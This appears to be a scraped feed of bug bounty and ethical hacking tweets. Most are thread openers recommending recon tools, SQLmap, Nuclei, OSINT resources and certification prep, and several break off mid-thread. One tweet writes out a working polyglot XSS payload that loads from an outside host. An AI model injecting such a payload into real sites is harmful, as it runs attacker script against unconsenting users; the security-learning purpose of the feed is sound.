THEBINARYBOT'S GUIDE TO API HACKING IS AVAILABLE NOW FOR SALE !!!
Learn and find different API-related vulnerabilities such as:
-BOLA
-BOFA
-SSRF
and more...
Use code "thebotswarm" to get the product for just $5. Valid till 6 Mar.
#bugbounty
Before doing a penetration test on a corporation, you must conduct OSINT, or open source intelligence, on the company's in scope assets.
Here's a list of commonly used OSINT tools below.
🧵👇
#OSINT
#bugbounty
#hacking
#pentesting
☃️Burp Suite for Pentester☃️
This cheatsheet is built for the Bug Bounty Hunters and Pentesters to help them find vulnerabilities using "BurpSuite". Learn how to:
➡️Use different extensions
➡️Fuzz with intruder
and much more...
#bugbounty
#cybersecurity
#infosec
#hacking
I re-watched
@GodfatherOrwa
's talk at
@InfoSecComm
's IWCON 2.0 and must say it's super informative.
The talk is ~45 minutes long but I have condensed the talk for you to read in 2 minutes.
75% of my Twitter DMs in the recent times have been people asking me "How to get started in Ethical Hacking?"
Although I love to answer everybody personally, I decided to write a thread of resources that would help any newbie level up.
🧵👇
#infosec
#bugbounty
#cybersecurity
The easiest P1/P2 afaik is Sensitive Information.
You can mostly find this on Github. Using the correct dorks would result in quick $$$$.
Here's a list of highly efficient Github dorks that I use on a regular basis.
🧵👇
#bugbounty
#dorks
#github
#bugbountytips
😱 I watched
@GodfatherOrwa
's insightful talk "The Power of Shodan - Leveraging Shodan for Critical Vulnerabilities" at
@NahamSec
's
#NahamCon2023
and have condensed the ~25 minute talk for you to read in 2 minutes.
Here's some interesting bug bounty tips and tricks ⬇️
🎅 If you're looking to crack OSCP in 2023, feel free to use the link below to download my OSCP Machines List Notion Template.
Practice, tick items off the list, crack OSCP 💻
🔗Link:
#infosec
#notion
#bugbounty
#cybersecurity
#notion
💉 SQL Injection is a P1 vulnerability and can easily help you earn $$$$
However, finding/exploiting one manually is tricky. That's where SQLmap helps us.
Here's a list of highly efficient SQLmap commands which you can use to hunt for SQL Injections 🧵👇
API hacking is simple, easier to learn and reproduce.
Down below are massive API hacking resources.
PS: You might definitely want to bookmark this and come.
I got around 10+ messages last week asking me for the tools I use in Bug Bounty.
So I thought why not make a thread on it.
Here's a list of my most used tools.
🧵👇
PS: This is my only my personal preference and I always experiment.
#bugbounty
#infosec
#recon
#cybersecurity
Simple recon:
1. Use katana, grab all links.
2. Then use gf and identify patterns on different vulnerabilities like IDOR, SQLi
3. Check source code for .js files and hidden endpoints/params
4. Do Shodan / Google / Bing / Duckduckgo Dorking
5. Naabu on top 1000 ports - each link
ANNOUNCEMENT 🚨
I'm building a bug bounty tools playbook for you all!
This page will your one-stop location to find the necessary commands to run for any tool of your choice - but for the first iteration I've included only the most prominent tools.
Any other tool you would
I've been following
@intigriti
's bug bounty tips for quite sometime and they're super valuable.
But it's no use if I just store them with me and not talk about my favourite ones that has worked magic.
So, here's 5 of my recent favourite
#bugbountytips
from
@intigriti
🧵👇
SQL Injection is a P1 critical vulnerability and you will get $$$$ for reporting this.
Learn how to use SQLMap to find your first SQL Injection vulnerability in this thread 👇
New to recon?
Looking for video tutorials to up your recon game?
Checkout the talks below 🧵👇
PS: All of these talks are super informative and well presented. There's no ranking per se. Do check them ALL out.
#bugbounty
#infosec
#cybersecurity
#recon
SqliSniper is a robust Python tool designed to detect time-based blind SQL injections in HTTP request headers.
Learn how to use this tool at its fullest to find your first SQL Injection 👇
If you're looking to enter the Cybersecurity space and looking for a job, I highly recommend you to checkout Stefan Waldvogel's website.
The amount of information present here is huge and very helpful.
🔗Link:
#infosec
#bugbounty
#cybersecurity
JavaScript://%250Aalert?.(1)//'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1)}//><Base/Href=//X55.is\76-->
This payload from
@brutelogic
is OP!
#bugbountytip
#bugbounty
🕵️♀️ Top 10 Active Directory toolsets used by red teamers and pentesting experts (bookmark to refer later):
1. PowerView: A popular tool for Active Directory reconnaissance, PowerView allows you to extract detailed information about users, groups, permissions, and more.
2.
Chrome Extensions and Firefox addons are gems for us bug bounty hunters if used properly.
Here's a thread of some plugins that I found useful and use on a daily basis.
🧵👇
#bugbounty
#infosec
#cybersecurity
3 ways to succeed at Bug Bounty
1. Hack daily, no matter what (at least 2 hours)
2. Read reports daily
3. Engage with the community
What would you add?
#bugbounty
☃️OWASP API Security 2023 Checklist☃️
In this checklist read on different scenarios to test APIs such as
➡️Broken authentication
➡️Server side request forgery
➡️Improper asset management
and much more...
#bugbounty
#cybersecurity
#infosec
☃️Penetration-Testing-Tools☃️
This massive repo has got almost everything you need such as tools, cheatsheets and scripts on various fields such as
➡️ Web Pentesting
➡️ Red Teaming
➡️ Cloud Assessments
and much more...
☃️ Traitor ☃️
Traitor automates Linux privilege escalation, exploiting misconfigurations and exploits for root shell access, including GTFOBins, writable docker.sock and more!
A super useful tool. Do check it out if you haven't already,
☃️Pentest Cheat Sheets☃️
This brilliant repo contains a lot one-liner/simple commands that we could use to our benefit when Penstesting. Highly useful if preparing for OSCP as well.
Link:
#bugbounty
#infosec
#hacking
#cybersecurity
#oscp
☃️Bug Bounty Beginner's Roadmap☃️
Many of you have asked me how to get started at bugbounty and what are the pre-requisites to get started.
This repository contains nearly everything you need to know and can help you get started easily with a variety of resources.
#bugbounty
HTTPX is not just used for filtering live hosts. It's a fantastic tool to do more than this.
Here are 7 different ways in which HTTPX can be used in your bug bounty journey 👇
If you can go back in time and start your journey into
#bugbounty
perfectly, what would you do?
I'll go first.
1. Start with
@PortSwigger
labs. Practice as I learn.
2. Visit and get my hands dirty.
3. Update myself regularly with
@intigriti
's bug bytes.
For those who are just starting in Bug Bounty, I politely ask you to read Web Fundamentals and understand how the internet works before testing applications.
Fortunately for you, I have created threads to explain them the best of my knowledge.
#bugbounty
#infosec
#cybersecurity
One of the biggest mistakes that I did in bug bounty was entering the field and trying to replicate what people did without understanding the basics.
If you are beginner then I urge you to know some fundamentals on how the internet functions, how web apps work etc.
🧵👇
☃️ DNSTake ☃️
DNSTake is a tool to check missing hosted DNS zones that can lead to subdomain takeover.
If you do not know what DNS takeover is, do read the repo's file where the author has explained it clearly.
☃️ Bug Bounty Reference ☃️
A repository that contains huge list of bug bounty writeups categorized by the bug nature such as
➡️ SQLi
➡️ XSS
➡️ RCE
and more ...
💉 SQL Injection is a P1 vulnerability and can easily help you earn $$$$
However, finding/exploiting one manually is tricky. That's where SQLmap helps us.
Here's a list of highly efficient SQLmap commands which you can use to hunt for SQL Injections 🧵👇
🔎 A simple recon checklist I follow (not in order)
- Shodan/Google/Bing Dorking
- Check JS files
- Subdomain enumeration
- Wayback URLs
- Content Discovery
- Vhost Scan
- Port Scan
- GitHub Search
What more would you add to the list?
A simple recon checklist I follow
- Check JS files
- Subdomain enumeration
- Wayback URLs
- Fuzzing
- Port Scan
What more would you add to the list?
#bugbounty
#recon
#cybersecurity
I passed eJPT yesterday and some folks out there wanted to know the preparation strategy to pass the exam at first take.
Thus, I decide to write on the resources I used, preparation duration and the overall difficulty in the thread below.
🧵👇
I revisited
@Jhaddix
's "The Bug Hunter Methodology v4: Recon Edition" and I must say that I learn new things every time I watch the recording.
While I recommend you all to watch the talk, I've also captured short notes which might help you.
Here's my notes summarized:
1.
SSRF bugs, often ignored, can easily earn you more than $1000💸
Checkout these top 5 features in a target app to find your first SSRF vulnerability 👇
1️⃣ Webhook Integration:
If your target supports web hook integration feature, then replace the URL with your Burp Collab and
What do I need to know before getting started in Bug Bounty?
This is one of the most frequently asked questions in my DMs, so I figured it would be better to write a thread about it.
Read more below.
🧵👇
#bugbounty
#infosec
#hacking
#cybersecurity
Nuclei is an awesome vulnerability scanning tool developed by
@pdiscoveryio
that helps to find vulnerabilities automatically based on simple YAML-based templates 🐞💰
Here are 7 ways you can use Nuclei to the fullest 👇